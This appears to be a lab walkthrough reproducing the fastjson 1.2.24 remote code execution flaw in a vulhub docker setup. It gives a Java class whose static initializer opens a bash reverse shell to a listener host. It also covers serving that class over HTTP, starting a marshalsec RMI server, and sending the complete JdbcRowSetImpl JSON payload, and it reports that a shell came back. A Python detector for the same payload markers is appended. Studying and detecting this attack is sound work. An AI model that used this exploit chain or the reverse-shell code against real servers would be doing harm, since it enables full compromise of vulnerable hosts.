Affected versions
fastjson <= 1.2.24
Environment setup:
1. Pull the docker environment:
cd /home/kali/桌面/vulhub/fastjson/1.2.24-rce
sudo docker-compose up -d
2. Check the docker port mapping
sudo docker ps
3. Open http://192.168.5.143:8090/ in the browser
Reproducing the vulnerability
- Probe the fastjson version
Capture the request, change the method to POST and add the body {"@type":"java.lang.AutoCloseable" (an error is displayed)
- Create a file TouchFile.java with the following content:
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    // Static initializer: runs as soon as the class is loaded by the target JVM
    // (here through the JNDI/RMI reference) and connects a reverse shell back
    // to the listener on 192.168.5.143:4444.
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.5.143/4444 0>&1"});
            p.waitFor();
        } catch (Exception e) {
            // Errors are swallowed so that class loading does not fail noisily.
        }
    }
}
Then compile TouchFile.java with the javac command (javac TouchFile.java).
- Start an HTTP server with python on kali
python3 -m http.server 1134
Put the TouchFile.class compiled in the previous step into the current directory and open http://192.168.5.143:1134/ to check that it is served
Use marshalsec-0.0.3-SNAPSHOT-all.jar
Download: https://github.com/RandomRobbieBF/marshalsec-jar
Start an RMI server that loads the remote class TouchFile.class.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.5.143:1134/#TouchFile" 9996
Then start a port listener with nc on kali:
Capture the request, change the method to POST and add the following content
POST / HTTP/1.1
Host: 192.168.5.143:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.5.143:9996/TouchFile",
"autoCommit":true
}
}
Result:
A reverse shell is returned.
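As an added example that is not part of the original write-up, the following Python detector flags the markers used in the steps above (an "@type" key, the com.sun.rowset.JdbcRowSetImpl class, and a JNDI rmi:// reference) in a captured request body, so a WAF or log review can spot this request shape. The sample bodies are constructed; treating ldap:// as a second JNDI scheme is an assumption beyond this page.

```python
# Added example (not from the write-up): flag fastjson autotype abuse in a
# captured request body. Markers come from the reproduction above: an "@type"
# key, the JdbcRowSetImpl gadget class, and a JNDI (rmi:// or ldap://, the
# latter assumed) reference in a string field. Sample bodies are constructed.
import json
import re

# Gadget classes named in the write-up; extend with your own deny-list.
SUSPICIOUS_TYPES = {"com.sun.rowset.JdbcRowSetImpl", "java.lang.AutoCloseable"}
JNDI_URL = re.compile(r"^(rmi|ldap)://", re.IGNORECASE)
RAW_TYPE = re.compile(r'"@type"\s*:')


def _walk(node, path, findings):
    """Recursively collect indicators from a parsed JSON value."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key == "@type":
                findings.append(f"autotype key at {here}")
                if isinstance(value, str) and value in SUSPICIOUS_TYPES:
                    findings.append(f"gadget class {value} at {here}")
            elif isinstance(value, str) and JNDI_URL.match(value):
                findings.append(f"JNDI reference {value} at {here}")
            _walk(value, here, findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, f"{path}[{i}]", findings)


def scan_body(body):
    """Return findings for one request body. A body that does not parse is
    scanned as raw text: the version probe above is deliberately malformed
    JSON that still carries "@type"."""
    findings = []
    try:
        _walk(json.loads(body), "", findings)
    except json.JSONDecodeError:
        if RAW_TYPE.search(body):
            findings.append("autotype key in malformed body (version probe?)")
    return findings


# Constructed samples: the payload shape from the write-up, the probe, benign JSON.
RCE_BODY = ('{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
            '"dataSourceName":"rmi://192.168.5.143:9996/TouchFile","autoCommit":true}}')
PROBE_BODY = '{"@type":"java.lang.AutoCloseable"'
BENIGN_BODY = '{"name":"alice","tags":["a","b"],"url":"https://example.com"}'
```

Calling scan_body on each sample returns three findings for the RCE body, one for the malformed probe and none for the benign body.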
Reference:
https://blog.csdn.net/weixin_44146996/article/details/111860438?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164499669816780366586530%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164499669816780366586530&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-111860438.pc_search_result_cache&utm_term=Fastjson1.2.24RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0&spm=1018.2226.3001.4187